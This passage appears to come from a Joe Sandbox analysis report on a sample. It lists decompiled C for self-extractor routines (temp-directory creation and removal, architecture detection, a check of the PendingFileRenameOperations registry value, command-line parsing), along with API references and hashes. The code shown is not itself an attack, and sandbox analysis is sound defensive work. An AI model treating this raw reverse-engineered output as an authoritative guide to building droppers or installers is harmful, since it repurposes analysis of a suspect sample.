                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010542B
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00105434
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00105452
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                                • API String ID: 1082909758-3361814588
                                                                                                                                                                                                                                                • Opcode ID: 3e3907497b7dd77ab8b4f32eaef8deeb72ad49b2c7c7879ff227d3e7bf53fd80
                                                                                                                                                                                                                                                • Instruction ID: c93672f7e75f66ed117c67face569c398cd2fb1b9a500fef267a6d53a42f20cf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e3907497b7dd77ab8b4f32eaef8deeb72ad49b2c7c7879ff227d3e7bf53fd80
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A011017170060877E3209B269C49FEF3A6EEFD1321F400125B6C6D25D0DFF889868AA6
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 522 105467-105484 523 10548a-105490 call 1053a1 522->523 524 10551c-105528 call 101680 522->524 527 105495-105497 523->527 528 10552d-105539 call 1058c8 524->528 529 105581-105583 527->529 530 10549d-1054c0 call 101781 527->530 537 10553b-105545 CreateDirectoryA 528->537 538 10554d-105552 528->538 532 10558d-10559d call 106ce0 529->532 539 1054c2-1054d8 GetSystemInfo 530->539 540 10550c-10551a call 10658a 530->540 542 105577-10557c call 106285 537->542 543 105547 537->543 544 105554-105557 call 10597d 538->544 545 105585-10558b 538->545 548 1054da-1054dd 539->548 549 1054fe 539->549 540->528 542->529 543->538 555 10555c-10555e 544->555 545->532 553 1054f7-1054fc 548->553 554 1054df-1054e2 548->554 556 105503-105507 call 10658a 549->556 553->556 557 1054f0-1054f5 554->557 558 1054e4-1054e7 554->558 555->545 559 105560-105566 555->559 556->540 557->556 558->540 561 1054e9-1054ee 558->561 559->529 562 105568-105575 RemoveDirectoryA 559->562 561->556 562->529
                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E00105467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t10;
                                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                                				intOrPtr _t14;
                                                                                                                                                                                                                                                				void* _t16;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				signed int _t26;
                                                                                                                                                                                                                                                				void* _t28;
                                                                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                                                                				CHAR* _t48;
                                                                                                                                                                                                                                                				signed int _t49;
                                                                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t10 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				if(__edx == 0) {
                                                                                                                                                                                                                                                					_t48 = 0x1091e4;
                                                                                                                                                                                                                                                					_t42 = 0x104;
                                                                                                                                                                                                                                                					E00101680(0x1091e4, 0x104);
                                                                                                                                                                                                                                                					L14:
                                                                                                                                                                                                                                                					_t13 = E001058C8(_t48); // executed
                                                                                                                                                                                                                                                					if(_t13 != 0) {
                                                                                                                                                                                                                                                						L17:
                                                                                                                                                                                                                                                						_t42 = _a4;
                                                                                                                                                                                                                                                						if(_a4 == 0) {
                                                                                                                                                                                                                                                							L23:
                                                                                                                                                                                                                                                							 *0x109124 = 0;
                                                                                                                                                                                                                                                							_t14 = 1;
                                                                                                                                                                                                                                                							L24:
                                                                                                                                                                                                                                                							return E00106CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t16 = E0010597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                                						if(_t16 != 0) {
                                                                                                                                                                                                                                                							goto L23;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t61 =  *0x108a20; // 0x0
                                                                                                                                                                                                                                                						if(_t61 != 0) {
                                                                                                                                                                                                                                                							 *0x108a20 = 0;
                                                                                                                                                                                                                                                							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						L22:
                                                                                                                                                                                                                                                						_t14 = 0;
                                                                                                                                                                                                                                                						goto L24;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                                						 *0x109124 = E00106285();
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *0x108a20 = 1;
                                                                                                                                                                                                                                                					goto L17;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t42 =  &_v268;
                                                                                                                                                                                                                                                				_t20 = E001053A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                                				if(_t20 == 0) {
                                                                                                                                                                                                                                                					goto L22;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_t48 = 0x1091e4;
                                                                                                                                                                                                                                                				E00101781(0x1091e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                                				if(( *0x109a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					_t42 = 0x104;
                                                                                                                                                                                                                                                					E0010658A(_t48, 0x104, 0x101140);
                                                                                                                                                                                                                                                					goto L14;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                                				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                                				if(_t26 == 0) {
                                                                                                                                                                                                                                                					_push("i386");
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					E0010658A(_t48, 0x104);
                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t28 = _t26 - 1;
                                                                                                                                                                                                                                                				if(_t28 == 0) {
                                                                                                                                                                                                                                                					_push("mips");
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t29 = _t28 - 1;
                                                                                                                                                                                                                                                				if(_t29 == 0) {
                                                                                                                                                                                                                                                					_push("alpha");
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t29 != 1) {
                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push("ppc");
                                                                                                                                                                                                                                                				goto L11;
                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                0x00105490
                                                                                                                                                                                                                                                0x00105497
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010549d
                                                                                                                                                                                                                                                0x001054ab
                                                                                                                                                                                                                                                0x001054b4
                                                                                                                                                                                                                                                0x001054c0
                                                                                                                                                                                                                                                0x0010550c
                                                                                                                                                                                                                                                0x00105511
                                                                                                                                                                                                                                                0x00105515
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105515
                                                                                                                                                                                                                                                0x001054c9
                                                                                                                                                                                                                                                0x001054d6
                                                                                                                                                                                                                                                0x001054d8
                                                                                                                                                                                                                                                0x001054fe
                                                                                                                                                                                                                                                0x00105503
                                                                                                                                                                                                                                                0x00105507
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105507
                                                                                                                                                                                                                                                0x001054da
                                                                                                                                                                                                                                                0x001054dd
                                                                                                                                                                                                                                                0x001054f7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001054f7
                                                                                                                                                                                                                                                0x001054df
                                                                                                                                                                                                                                                0x001054e2
                                                                                                                                                                                                                                                0x001054f0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001054f0
                                                                                                                                                                                                                                                0x001054e7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001054e9
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001054C9
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010553D
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010556F
                                                                                                                                                                                                                                                  • Part of subcall function 001053A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001053FB
                                                                                                                                                                                                                                                  • Part of subcall function 001053A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00105402
                                                                                                                                                                                                                                                  • Part of subcall function 001053A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010541F
                                                                                                                                                                                                                                                  • Part of subcall function 001053A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010542B
                                                                                                                                                                                                                                                  • Part of subcall function 001053A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00105434
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                                • API String ID: 1979080616-510557316
                                                                                                                                                                                                                                                • Opcode ID: 5dcd533812b587356c8927190d60a1705486754b5a770db91f5f5be5200d44ee
                                                                                                                                                                                                                                                • Instruction ID: 70fc55f886ec6dd77d7ead368968f846228a759639b0042986a842f7167e42b5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dcd533812b587356c8927190d60a1705486754b5a770db91f5f5be5200d44ee
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B331F571B00A14ABCB149F299C4497F77ABAB95350B04412AB8C2E79D1DFF4CE82CE95
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 563 10256d-10257d 564 102622-102627 call 1024e0 563->564 565 102583-102589 563->565 573 102629-10262f 564->573 567 1025e8-102607 RegOpenKeyExA 565->567 568 10258b 565->568 569 1025e3-1025e6 567->569 570 102609-102620 RegQueryInfoKeyA 567->570 572 102591-102595 568->572 568->573 569->573 574 1025d1-1025dd RegCloseKey 570->574 572->573 575 10259b-1025ba RegOpenKeyExA 572->575 574->569 575->569 576 1025bc-1025cb RegQueryValueExA 575->576 576->574
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E0010256D(signed int __ecx) {
                                                                                                                                                                                                                                                				int _v8;
                                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                                				signed int _t19;
                                                                                                                                                                                                                                                				long _t24;
                                                                                                                                                                                                                                                				void* _t26;
                                                                                                                                                                                                                                                				int _t31;
                                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                                				_t31 = 0;
                                                                                                                                                                                                                                                				if(_t13 == 0) {
                                                                                                                                                                                                                                                					_t31 = E001024E0(_t26);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t34 = _t13 - 1;
                                                                                                                                                                                                                                                					if(_t34 == 0) {
                                                                                                                                                                                                                                                						_v8 = 0;
                                                                                                                                                                                                                                                						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                                							goto L7;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						L12:
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                                							_v8 = 0;
                                                                                                                                                                                                                                                							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                                							if(_t24 == 0) {
                                                                                                                                                                                                                                                								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                                								L6:
                                                                                                                                                                                                                                                								asm("sbb eax, eax");
                                                                                                                                                                                                                                                								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                                								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							L7:
                                                                                                                                                                                                                                                							_t31 = _v8;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t31;
                                                                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00104096,00104096,?,00101ED3,00000001,00000000,?,?,00104137,?), ref: 001025B2
                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00104096,?,00101ED3,00000001,00000000,?,?,00104137,?,00104096), ref: 001025CB
                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,00101ED3,00000001,00000000,?,?,00104137,?,00104096), ref: 001025DD
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00104096,00104096,?,00101ED3,00000001,00000000,?,?,00104137,?), ref: 001025FF
                                                                                                                                                                                                                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00104096,00000000,00000000,00000000,00000000,?,00101ED3,00000001,00000000), ref: 0010261A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • PendingFileRenameOperations, xrefs: 001025C3
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager, xrefs: 001025A8
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 001025F5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
• Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                                • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                                • Opcode ID: 00a5f43d91a453d6f7cc0e5f864739e810e45e02ab557cc3e023cb306beeff05
                                                                                                                                                                                                                                                • Instruction ID: d81ed09acab34bb883645aa2c7f1c29ea242935fec8735f6e2b3c5d3a12e8297
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00a5f43d91a453d6f7cc0e5f864739e810e45e02ab557cc3e023cb306beeff05
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28119135942228BBDF209B919C0DDFBBF7CEF017A1F508055F888E2080D7B04E48D6A1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed, Not Executed), entry block 106a60-106a91
                                                                                                                                                                                                                                                C-Code - Quality: 51%
                                                                                                                                                                                                                                                			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                				signed int* _t25;
                                                                                                                                                                                                                                                				signed int _t26;
                                                                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                                                                				int _t30;
                                                                                                                                                                                                                                                				signed int _t37;
                                                                                                                                                                                                                                                				signed char _t41;
                                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                                				signed int _t54;
                                                                                                                                                                                                                                                				intOrPtr _t56;
                                                                                                                                                                                                                                                				signed int _t58;
                                                                                                                                                                                                                                                				signed int _t59;
                                                                                                                                                                                                                                                				intOrPtr* _t60;
                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                				void* _t67;
                                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				E00107155();
                                                                                                                                                                                                                                                				_push(0x58);
                                                                                                                                                                                                                                                				_push(0x1072b8);
                                                                                                                                                                                                                                                				E00107208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                                				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                                				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                                				_t53 = 0;
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x1088b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x1088b0; // 0x2
						if(__eflags != 0) {
							 *0x1081e4 = _t58;
							goto L13;
						} else {
							 *0x1088b0 = _t58;
							_t37 = E00106C3F(0x1010b8, 0x1010c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00106FF4();
						L13:
						_t68 =  *0x1088b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x1010b4);
							_push(0x1010ac);
							L00107202();
							 *0x1088b0 = 2;
						}
						if(_t53 == 0) {
							 *0x1088ac = 0;
						}
						_t71 =  *0x1088b4;
						if( *0x1088b4 != 0 && E00107060(_t71, 0x1088b4) != 0) {
							_t60 =  *0x1088b4; // 0x0
							 *0x10a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00102BFB(0x100000, 0, _t59); // executed
							 *0x1081e0 = _t30;
							__eflags =  *0x1081f8;
							if( *0x1081f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x1081e4;
							if( *0x1081e4 == 0) {
								__imp___cexit();
								_t30 =  *0x1081e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0010724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

                                                                                                                                                                                                                                                0x00106abf
                                                                                                                                                                                                                                                0x00106ac5
                                                                                                                                                                                                                                                0x00106ad1
                                                                                                                                                                                                                                                0x00106ad7
                                                                                                                                                                                                                                                0x00106b05
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106ad9
                                                                                                                                                                                                                                                0x00106ad9
                                                                                                                                                                                                                                                0x00106ae9
                                                                                                                                                                                                                                                0x00106af0
                                                                                                                                                                                                                                                0x00106af2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106af4
                                                                                                                                                                                                                                                0x00106af4
                                                                                                                                                                                                                                                0x00106afb
                                                                                                                                                                                                                                                0x00106afb
                                                                                                                                                                                                                                                0x00106af2
                                                                                                                                                                                                                                                0x00106ac7
                                                                                                                                                                                                                                                0x00106ac7
                                                                                                                                                                                                                                                0x00106ac9
                                                                                                                                                                                                                                                0x00106b0b
                                                                                                                                                                                                                                                0x00106b0b
                                                                                                                                                                                                                                                0x00106b11
                                                                                                                                                                                                                                                0x00106b13
                                                                                                                                                                                                                                                0x00106b18
                                                                                                                                                                                                                                                0x00106b1d
                                                                                                                                                                                                                                                0x00106b24
                                                                                                                                                                                                                                                0x00106b24
                                                                                                                                                                                                                                                0x00106b30
                                                                                                                                                                                                                                                0x00106b39
                                                                                                                                                                                                                                                0x00106b39
                                                                                                                                                                                                                                                0x00106b3b
                                                                                                                                                                                                                                                0x00106b42
                                                                                                                                                                                                                                                0x00106b57
                                                                                                                                                                                                                                                0x00106b5f
                                                                                                                                                                                                                                                0x00106b65
                                                                                                                                                                                                                                                0x00106b65
                                                                                                                                                                                                                                                0x00106b67
                                                                                                                                                                                                                                                0x00106b6c
                                                                                                                                                                                                                                                0x00106b6e
                                                                                                                                                                                                                                                0x00106b71
                                                                                                                                                                                                                                                0x00106b74
                                                                                                                                                                                                                                                0x00106b74
                                                                                                                                                                                                                                                0x00106b79
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106b7d
                                                                                                                                                                                                                                                0x00106b81
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106b83
                                                                                                                                                                                                                                                0x00106b8c
                                                                                                                                                                                                                                                0x00106b8d
                                                                                                                                                                                                                                                0x00106b90
                                                                                                                                                                                                                                                0x00106b90
                                                                                                                                                                                                                                                0x00106b83
                                                                                                                                                                                                                                                0x00106b81
                                                                                                                                                                                                                                                0x00106b94
                                                                                                                                                                                                                                                0x00106b98
                                                                                                                                                                                                                                                0x00106ba2
                                                                                                                                                                                                                                                0x00106b9a
                                                                                                                                                                                                                                                0x00106b9a
                                                                                                                                                                                                                                                0x00106b9a
                                                                                                                                                                                                                                                0x00106ba3
                                                                                                                                                                                                                                                0x00106bab
                                                                                                                                                                                                                                                0x00106bb0
                                                                                                                                                                                                                                                0x00106bb5
                                                                                                                                                                                                                                                0x00106bbc
                                                                                                                                                                                                                                                0x00106bbf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106bbf
                                                                                                                                                                                                                                                0x00106c1e
                                                                                                                                                                                                                                                0x00106c25
                                                                                                                                                                                                                                                0x00106c27
                                                                                                                                                                                                                                                0x00106c2d
                                                                                                                                                                                                                                                0x00106c2d
                                                                                                                                                                                                                                                0x00106c32
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106bc5
                                                                                                                                                                                                                                                0x00106bc5
                                                                                                                                                                                                                                                0x00106bc8
                                                                                                                                                                                                                                                0x00106bcc
                                                                                                                                                                                                                                                0x00106bce
                                                                                                                                                                                                                                                0x00106bce
                                                                                                                                                                                                                                                0x00106bd1
                                                                                                                                                                                                                                                0x00106bd3
                                                                                                                                                                                                                                                0x00106bd3
                                                                                                                                                                                                                                                0x00106bd6
                                                                                                                                                                                                                                                0x00106bda
                                                                                                                                                                                                                                                0x00106be1
                                                                                                                                                                                                                                                0x00106be3
                                                                                                                                                                                                                                                0x00106be5
                                                                                                                                                                                                                                                0x00106be5
                                                                                                                                                                                                                                                0x00106be6
                                                                                                                                                                                                                                                0x00106be6
                                                                                                                                                                                                                                                0x00106be9
                                                                                                                                                                                                                                                0x00106bea
                                                                                                                                                                                                                                                0x00106bea
                                                                                                                                                                                                                                                0x00106b74
                                                                                                                                                                                                                                                0x00106c39
                                                                                                                                                                                                                                                0x00106c3e
                                                                                                                                                                                                                                                0x00106c3e
                                                                                                                                                                                                                                                0x00106abe
                                                                                                                                                                                                                                                0x00106abe
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
